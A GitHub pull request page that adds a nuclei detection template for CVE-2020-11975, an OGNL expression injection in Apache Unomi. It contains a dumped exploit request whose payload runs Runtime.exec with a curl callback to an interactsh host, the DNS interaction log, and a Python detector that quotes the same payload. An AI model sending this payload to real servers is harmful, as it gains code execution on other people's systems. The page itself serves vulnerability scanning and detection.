
Conversation

@Sourabh-Sahu
Contributor

Template / PR Information

Added CVE-2020-11975 : Apache Unomi - Expression Language Injection

Template Validation

I've validated this template locally?

  • YES
  • NO
└─$ nuclei -u http://192.168.1.32:8181 -t CVE-2020-11975.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.3.2

		projectdiscovery.io

[WRN] Found 1 templates loaded with deprecated protocol syntax, update before v3 for continued support.
[INF] Current nuclei version: v3.3.2 (outdated)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[INF] [CVE-2020-11975] Dumped HTTP request for http://192.168.1.32:8181/context.json

POST /context.json HTTP/1.1
Host: 192.168.1.32:8181
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15
Connection: close
Content-Length: 737
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

{
  "personalizations":[
    {
      "id":"gender-test_anystr",
      "strategy":"matching-first",
      "strategyOptions":{
        "fallback":"var2"
      },
      "contents":[
        {
          "filters":[
            {
              "condition":{
                "parameterValues":{
                  "propertyName":"(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"curl d1v446p3hd7d1eercva0fr1a6jhfyw5jd.oast.live\"))",
                  "comparisonOperator":"equals_anystr",
                  "propertyValue":"male_anystr"
                },
                "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"test-demo-session-id"
}
[DBG] [CVE-2020-11975] Dumped HTTP response http://192.168.1.32:8181/context.json

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
Access-Control-Allow-Methods: OPTIONS, POST, GET
Access-Control-Allow-Origin: *
Content-Type: application/json;charset=utf-8
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(9.3.21.v20170918)
Set-Cookie: context-profile-id=8911110f-537c-4ca9-8202-a5d15960b890;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT
Set-Cookie: context-profile-id=8a3e4471-6754-4dfe-b367-c846334069c0;Path=/;Expires=Tue, 21-Jul-2026 13:35:25 GMT

{"profileId":"8a3e4471-6754-4dfe-b367-c846334069c0","sessionId":"test-demo-session-id","profileProperties":null,"sessionProperties":null,"profileSegments":null,"filteringResults":null,"personalizations":{"gender-test_anystr":["var2"]},"trackedConditions":[],"anonymousBrowsing":false,"consents":{}}
[d1V446p3HD7d1EercvA0fr1A6jhfyw5jD] Received DNS interaction from 172.253.220.24 at 2025-07-21 13:35:25
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	IN	 A



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 28451
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	IN	 A

;; ANSWER SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	A	178.128.210.172

;; AUTHORITY SECTION:
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	NS	ns1.oast.live.
d1V446p3HD7d1EercvA0fr1A6jhfyw5jD.OAsT.livE.	3600	IN	NS	ns2.oast.live.

;; ADDITIONAL SECTION:
ns1.oast.live.	3600	IN	A	178.128.210.172
ns2.oast.live.	3600	IN	A	178.128.210.172


[CVE-2020-11975:word-1] [http] [critical] http://192.168.1.32:8181/context.json

/claim #12668

Additional References:
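
Added example for this page, not code from the pull request or from the nuclei template: a detector that walks a `/context.json` body of the shape dumped above and flags any value under a condition's `parameterValues` that carries OGNL syntax. The two request bodies inside it are constructed for the example; the exploit string mirrors the dumped request, with `#r=@java.lang.Runtime@getRuntime()` assumed as the static-call form and `example.oast.live` standing in for the interactsh host.

```python
"""Flag OGNL expression injection in Apache Unomi /context.json request bodies.

Added example, not the nuclei template's code. CVE-2020-11975 abuses the
``propertyName`` of a ``profilePropertyCondition``, which vulnerable Unomi
versions evaluated as an expression instead of treating as a plain property
name. The sample bodies below are constructed; the payload string is assumed
to match the dumped request on the page.
"""
import json
import re
from typing import Iterator, List, Tuple

# OGNL constructs that never belong in a property name or value:
#   (#x=                 context-variable assignment
#   @a.b.C@m(            static method call
#   #x.m(                method call on a context variable
#   getRuntime / .exec(  the usual road to java.lang.Runtime
OGNL_MARKERS = re.compile(
    r"\(\s*#\w+\s*=|@[\w.]+@\w+\s*\(|#\w+\.\w+\s*\(|getRuntime|\.exec\s*\("
)

# Constructed: the request shape from the dumped POST, with a placeholder callback host.
MALICIOUS_BODY = json.dumps({
    "personalizations": [{
        "id": "gender-test",
        "strategy": "matching-first",
        "strategyOptions": {"fallback": "var2"},
        "contents": [{
            "filters": [{
                "condition": {
                    "parameterValues": {
                        "propertyName": '(#r=@java.lang.Runtime@getRuntime()).(#r.exec("curl example.oast.live"))',
                        "comparisonOperator": "equals",
                        "propertyValue": "male",
                    },
                    "type": "profilePropertyCondition",
                }
            }]
        }]
    }],
    "sessionId": "test-demo-session-id",
})

# Constructed: the same request with a legitimate property name.
BENIGN_BODY = json.dumps({
    "personalizations": [{
        "id": "gender-test",
        "strategy": "matching-first",
        "strategyOptions": {"fallback": "var2"},
        "contents": [{
            "filters": [{
                "condition": {
                    "parameterValues": {
                        "propertyName": "properties.gender",
                        "comparisonOperator": "equals",
                        "propertyValue": "male",
                    },
                    "type": "profilePropertyCondition",
                }
            }]
        }]
    }],
    "sessionId": "test-demo-session-id",
})


def _walk_conditions(node, path: str = "$") -> Iterator[Tuple[str, dict]]:
    """Yield (json_path, dict) for every object that carries a 'parameterValues' dict.

    Recursing into every dict and list also covers nested conditions, e.g. a
    booleanCondition whose subConditions hold the injected propertyName.
    """
    if isinstance(node, dict):
        if isinstance(node.get("parameterValues"), dict):
            yield path, node
        for key, value in node.items():
            yield from _walk_conditions(value, f"{path}.{key}")
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from _walk_conditions(value, f"{path}[{idx}]")


def find_ognl_injection(body: str) -> List[Tuple[str, str]]:
    """Return [(json_path, offending_value)] for each parameterValues entry holding OGNL syntax.

    A body that is not valid JSON is reported at path "$" instead of being
    silently passed, so a WAF rule or log pipeline built on this does not fail open.
    """
    try:
        doc = json.loads(body)
    except ValueError as exc:
        return [("$", f"unparseable JSON: {exc}")]
    hits: List[Tuple[str, str]] = []
    for path, cond in _walk_conditions(doc):
        for field, value in cond["parameterValues"].items():
            for item in (value if isinstance(value, list) else [value]):
                if isinstance(item, str) and OGNL_MARKERS.search(item):
                    hits.append((f"{path}.parameterValues.{field}", item))
    return hits


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, find_ognl_injection(body))
```

Note that the dumped response above (200, fallback `var2` echoed back under `personalizations`) looks the same whether or not the expression ran, which is why the template has to rely on the interactsh DNS hit rather than on the HTTP body; a defender watching the request side has a much clearer signal, since a legitimate `propertyName` is a bare path like `properties.gender`.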

Sourabh-Sahu and others added 2 commits July 21, 2025 19:30
- improve template name clarity (Remote Code Execution)
- refine description for better readability
- add impact and remediation sections
- add official Apache security advisory reference
- enhance classification with EPSS scores and CPE
- add vendor/product metadata and Shodan query
- reorder tags for consistency (cve first)
@princechaddha
Member

Thank you for contributing to nuclei-templates! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Review Summary

I've reviewed your CVE-2020-11975 Apache Unomi template and made several enhancements to improve its quality and consistency with project standards.

Changes Made ✅

  • Enhanced template name from "Apache Unomi - Expression Language Injection" to "Apache Unomi - Remote Code Execution" for clarity
  • Refined description for better readability and conciseness
  • Added impact section explaining the potential consequences of successful exploitation
  • Added remediation section with specific mitigation steps
  • Added official Apache security advisory reference
  • Enhanced classification section with EPSS scores and CPE information
  • Added vendor/product metadata for better categorization
  • Added Shodan query for improved discoverability: http.title:"Apache Unomi" || "Apache Unomi"
  • Reordered tags for consistency (CVE tags first): cve,cve2020,apache,unomi,rce,ognl,oast

Template Validation

  • ✅ Template ID matches CVE identifier
  • ✅ Template is in correct directory (http/cves/2020/)
  • ✅ No duplicate templates found
  • ✅ Follows proper YAML structure and CVE template format
  • ✅ Uses OAST (out-of-band) detection with interactsh for reliable RCE verification
  • ✅ Contains proper OGNL payload for Apache Unomi exploitation

Other Suggestions

  • The template effectively uses OAST detection which is excellent for RCE verification
  • The OGNL payload is well-crafted and targets the known vulnerable endpoint
  • Consider testing against a vulnerable Apache Unomi instance if possible to ensure the payload works reliably

The template now follows project standards with comprehensive metadata, proper classification, and clear documentation. Excellent work on creating this critical CVE template!


Note: I am an experimental AI Template Bot. The ProjectDiscovery team will review this PR shortly.

@princechaddha princechaddha added the "Status: In Progress" label (This issue is being worked on, and has someone assigned.) Jul 23, 2025
@ritikchaddha ritikchaddha added the "waiting for more info" and "Done" (Ready to merge) labels and removed the "Status: In Progress" (This issue is being worked on, and has someone assigned.) and "waiting for more info" labels Aug 18, 2025
@ritikchaddha
Contributor

Hello @Sourabh-Sahu, thank you for sharing this template and providing additional information. The template is now ready to merge.🥂

@DhiyaneshGeek DhiyaneshGeek merged commit a5dce36 into projectdiscovery:main Aug 22, 2025
3 checks passed
@princechaddha princechaddha linked an issue Sep 1, 2025 that may be closed by this pull request
Successfully merging this pull request may close these issues.

CVE-2018-19127 - PHPCMS 2008 - Remote Code Execution 💰

4 participants